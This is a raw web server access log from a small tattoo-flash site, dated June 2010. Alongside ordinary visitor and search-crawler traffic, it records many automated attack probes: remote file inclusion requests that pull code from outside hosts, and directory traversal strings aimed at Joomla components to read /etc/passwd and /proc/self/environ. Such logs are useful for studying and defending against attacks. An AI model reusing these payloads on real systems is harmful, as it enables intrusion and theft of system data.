90.230.4.134 - - [27/Jun/2010:06:15:00 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
90.230.4.134 - - [27/Jun/2010:06:15:01 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
72.52.150.147 - - [27/Jun/2010:06:17:58 -0500] "GET /logs/access_log.1274572800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.seowlyx.com/includes/id.jpg? HTTP/1.1" 404 336 "-""libwww-perl/5.831"
72.52.150.147 - - [27/Jun/2010:06:17:58 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.seowlyx.com/includes/id.jpg? HTTP/1.1" 404 309 "-""libwww-perl/5.831"
72.52.150.147 - - [27/Jun/2010:06:17:58 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.seowlyx.com/includes/id.jpg? HTTP/1.1" 404 314 "-""libwww-perl/5.831"
67.30.129.57 - - [27/Jun/2010:06:18:41 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
67.30.129.57 - - [27/Jun/2010:06:18:41 -0500] "GET /logs/access_log.1266710400%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
67.30.129.57 - - [27/Jun/2010:06:18:41 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
67.30.129.57 - - [27/Jun/2010:06:18:44 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
67.30.129.57 - - [27/Jun/2010:06:18:44 -0500] "GET /logs/access_log.1266710400%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
67.30.129.57 - - [27/Jun/2010:06:18:44 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
202.62.103.120 - - [27/Jun/2010:06:20:26 -0500] "GET /logs/access_log.1274054400/*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-""libwww-perl/5.834"
202.62.103.120 - - [27/Jun/2010:06:20:31 -0500] "GET /*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 285 "-""libwww-perl/5.834"
202.62.103.120 - - [27/Jun/2010:06:20:36 -0500] "GET /logs/*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 290 "-""libwww-perl/5.834"
207.46.204.179 - - [27/Jun/2010:06:22:11 -0500] "GET /logs/access_log.1176336000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.206.120.196 - - [27/Jun/2010:06:22:26 -0500] "GET /logs/access_log.1276041600/*.?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-""libwww-perl/5.79"
207.46.204.14 - - [27/Jun/2010:06:22:43 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.204.14 - - [27/Jun/2010:06:22:43 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
72.52.150.147 - - [27/Jun/2010:06:23:09 -0500] "GET /logs/access_log.1266710400//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.seowlyx.com/includes/id.jpg? HTTP/1.1" 404 336 "-""libwww-perl/5.831"
67.195.112.180 - - [27/Jun/2010:06:24:54 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [27/Jun/2010:06:24:54 -0500] "GET /tattoo/tattoo1.htm HTTP/1.0" 304 - "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.13.134 - - [27/Jun/2010:06:27:41 -0500] "GET /logs/access_log.1166227200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
202.62.103.120 - - [27/Jun/2010:06:27:58 -0500] "GET /*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 285 "-""libwww-perl/5.834"
64.22.67.47 - - [27/Jun/2010:06:30:41 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.bargainsinfo.com//data/1???? HTTP/1.1" 404 315 "-""Mozilla/5.0"
64.22.67.47 - - [27/Jun/2010:06:30:41 -0500] "GET /logs/access_log.1266710400%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.bargainsinfo.com//data/1???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
64.22.67.47 - - [27/Jun/2010:06:30:42 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.bargainsinfo.com//data/1???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
64.22.67.47 - - [27/Jun/2010:06:30:49 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.bargainsinfo.com//data/1???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
64.22.67.47 - - [27/Jun/2010:06:30:49 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.bargainsinfo.com//data/1???? HTTP/1.1" 404 315 "-""Mozilla/5.0"
64.22.67.47 - - [27/Jun/2010:06:30:49 -0500] "GET /logs/access_log.1266710400%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.bargainsinfo.com//data/1???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
69.211.26.205 - - [27/Jun/2010:06:33:54 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
69.211.26.205 - - [27/Jun/2010:06:33:54 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
69.211.26.205 - - [27/Jun/2010:06:33:56 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
69.211.26.205 - - [27/Jun/2010:06:33:58 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
69.211.26.205 - - [27/Jun/2010:06:34:03 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
91.203.13.114 - - [27/Jun/2010:06:35:51 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://zamyr.freeblogshost.in/100505/""Opera/9.52 (Windows NT 5.1; U; ru)"
202.62.103.120 - - [27/Jun/2010:06:39:32 -0500] "GET /phphtml.php?htmlclass_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""libwww-perl/5.834"
66.249.71.144 - - [27/Jun/2010:06:39:45 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "-""DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
67.195.112.180 - - [27/Jun/2010:06:43:04 -0500] "GET /logs/access_log.1161043200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [27/Jun/2010:06:44:27 -0500] "GET /logs/access_log.1203465600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.199.180 - - [27/Jun/2010:06:44:29 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
208.180.27.50 - - [27/Jun/2010:06:48:25 -0500] "GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
81.31.149.80 - - [27/Jun/2010:06:52:19 -0500] "GET /?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.808"
202.62.103.120 - - [27/Jun/2010:06:57:23 -0500] "GET /logs/access_log.1276819200/*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-""libwww-perl/5.834"
202.62.103.120 - - [27/Jun/2010:06:57:29 -0500] "GET /*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 285 "-""libwww-perl/5.834"
202.62.103.120 - - [27/Jun/2010:06:57:34 -0500] "GET /logs/*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 290 "-""libwww-perl/5.834"
81.31.149.80 - - [27/Jun/2010:06:59:33 -0500] "GET /logs/access_log.1274572800/?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.808"
81.31.149.80 - - [27/Jun/2010:06:59:33 -0500] "GET /?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.808"
81.31.149.80 - - [27/Jun/2010:06:59:34 -0500] "GET /logs/?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11106 "-""libwww-perl/5.808"
81.31.149.80 - - [27/Jun/2010:06:59:34 -0500] "GET /logs/access_log.1274832000/?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.808"
81.31.149.80 - - [27/Jun/2010:07:00:34 -0500] "GET /logs/access_log.1274572800/?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.808"
81.31.149.80 - - [27/Jun/2010:07:00:34 -0500] "GET /?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.808"
81.31.149.80 - - [27/Jun/2010:07:00:34 -0500] "GET /logs/?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11106 "-""libwww-perl/5.808"
81.31.149.80 - - [27/Jun/2010:07:00:38 -0500] "GET /logs/access_log.1274832000/?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.808"
202.62.103.120 - - [27/Jun/2010:07:01:11 -0500] "GET /logs/access_log.1276732800/*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-""libwww-perl/5.834"
208.180.27.50 - - [27/Jun/2010:07:03:21 -0500] "GET /logs/access_log.1276473600/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
208.180.27.50 - - [27/Jun/2010:07:03:21 -0500] "GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
208.180.27.50 - - [27/Jun/2010:07:03:21 -0500] "GET /logs/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
202.62.103.120 - - [27/Jun/2010:07:04:47 -0500] "GET /logs/access_log.1274054400/*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-""libwww-perl/5.834"
202.62.103.120 - - [27/Jun/2010:07:04:51 -0500] "GET /*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 285 "-""libwww-perl/5.834"
202.62.103.120 - - [27/Jun/2010:07:04:55 -0500] "GET /logs/*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 290 "-""libwww-perl/5.834"
194.63.248.34 - - [27/Jun/2010:07:16:48 -0500] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.813"
194.63.248.34 - - [27/Jun/2010:07:16:53 -0500] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.813"
194.109.22.66 - - [27/Jun/2010:07:37:28 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
194.109.22.66 - - [27/Jun/2010:07:37:28 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
194.109.22.66 - - [27/Jun/2010:07:37:28 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
194.109.22.66 - - [27/Jun/2010:07:37:28 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
194.109.22.66 - - [27/Jun/2010:07:37:28 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
194.109.22.66 - - [27/Jun/2010:07:37:28 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
194.109.22.66 - - [27/Jun/2010:07:37:29 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
194.109.22.66 - - [27/Jun/2010:07:37:29 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
194.109.22.66 - - [27/Jun/2010:07:37:29 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
86.109.170.175 - - [27/Jun/2010:07:40:51 -0500] "GET /?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
86.109.170.175 - - [27/Jun/2010:07:40:52 -0500] "GET /?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
86.109.170.175 - - [27/Jun/2010:07:46:41 -0500] "GET /logs/access_log.1276732800/?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.79"
86.109.170.175 - - [27/Jun/2010:07:46:41 -0500] "GET /logs/access_log.1276732800/?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.79"
86.109.170.175 - - [27/Jun/2010:07:46:41 -0500] "GET /?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
86.109.170.175 - - [27/Jun/2010:07:46:41 -0500] "GET /?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
86.109.170.175 - - [27/Jun/2010:07:46:41 -0500] "GET /logs/?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11106 "-""libwww-perl/5.79"
86.109.170.175 - - [27/Jun/2010:07:46:41 -0500] "GET /logs/?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11106 "-""libwww-perl/5.79"
86.109.170.175 - - [27/Jun/2010:07:49:02 -0500] "GET /logs/access_log.1276819200/?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.79"
86.109.170.175 - - [27/Jun/2010:07:49:04 -0500] "GET /logs/access_log.1276819200/?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.79"
66.249.71.144 - - [27/Jun/2010:07:49:38 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
86.109.170.175 - - [27/Jun/2010:07:54:29 -0500] "GET /logs/access_log.1276732800/?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.79"
86.109.170.175 - - [27/Jun/2010:07:54:29 -0500] "GET /?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
86.109.170.175 - - [27/Jun/2010:07:54:30 -0500] "GET /logs/?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11106 "-""libwww-perl/5.79"
86.109.170.175 - - [27/Jun/2010:07:54:34 -0500] "GET /logs/access_log.1276732800/?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.79"
86.109.170.175 - - [27/Jun/2010:07:54:34 -0500] "GET /?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
86.109.170.175 - - [27/Jun/2010:07:54:34 -0500] "GET /logs/?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11106 "-""libwww-perl/5.79"
86.109.170.175 - - [27/Jun/2010:07:57:51 -0500] "GET /logs/access_log.1276214400/?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.79"
86.109.170.175 - - [27/Jun/2010:07:57:53 -0500] "GET /logs/access_log.1276214400/?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.79"
90.50.175.96 - - [27/Jun/2010:08:03:30 -0500] "GET /logs/access_log.1276473600 HTTP/1.1" 200 274101 "http://yandex.ru/yandsearch?text=ru-RU.com_properties.ini&lr=124""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; Embedded Web Browser from: http://bsalsa.com/; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
202.62.103.120 - - [27/Jun/2010:08:07:17 -0500] "GET /logs/access_log.1266710400/phphtml.php?htmlclass_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""libwww-perl/5.834"
202.62.103.120 - - [27/Jun/2010:08:07:18 -0500] "GET /phphtml.php?htmlclass_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""libwww-perl/5.834"
202.62.103.120 - - [27/Jun/2010:08:07:18 -0500] "GET /logs/phphtml.php?htmlclass_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""libwww-perl/5.834"
87.54.38.148 - - [27/Jun/2010:08:07:50 -0500] "GET /logs/access_log.1274054400//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
87.54.38.148 - - [27/Jun/2010:08:07:50 -0500] "GET //index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
87.54.38.148 - - [27/Jun/2010:08:07:50 -0500] "GET /logs//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
66.249.71.100 - - [27/Jun/2010:08:09:16 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "-""DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
66.249.71.100 - - [27/Jun/2010:08:09:24 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "-""DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
66.249.71.100 - - [27/Jun/2010:08:09:25 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "-""DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
66.249.71.100 - - [27/Jun/2010:08:09:25 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "-""DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
66.249.71.100 - - [27/Jun/2010:08:09:28 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "-""DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
66.249.71.237 - - [27/Jun/2010:08:09:53 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "-""DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
66.249.71.237 - - [27/Jun/2010:08:09:54 -0500] "GET /tattoo/links.htm HTTP/1.1" 200 1325 "-""DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
124.188.18.224 - - [27/Jun/2010:08:10:17 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
124.188.18.224 - - [27/Jun/2010:08:10:17 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
124.188.18.224 - - [27/Jun/2010:08:10:20 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
124.188.18.224 - - [27/Jun/2010:08:10:38 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
124.188.18.224 - - [27/Jun/2010:08:10:39 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
124.188.18.224 - - [27/Jun/2010:08:10:39 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
124.188.18.224 - - [27/Jun/2010:08:10:39 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
124.188.18.224 - - [27/Jun/2010:08:10:39 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
124.188.18.224 - - [27/Jun/2010:08:10:39 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
124.188.18.224 - - [27/Jun/2010:08:10:39 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
124.188.18.224 - - [27/Jun/2010:08:10:39 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
124.188.18.224 - - [27/Jun/2010:08:10:40 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
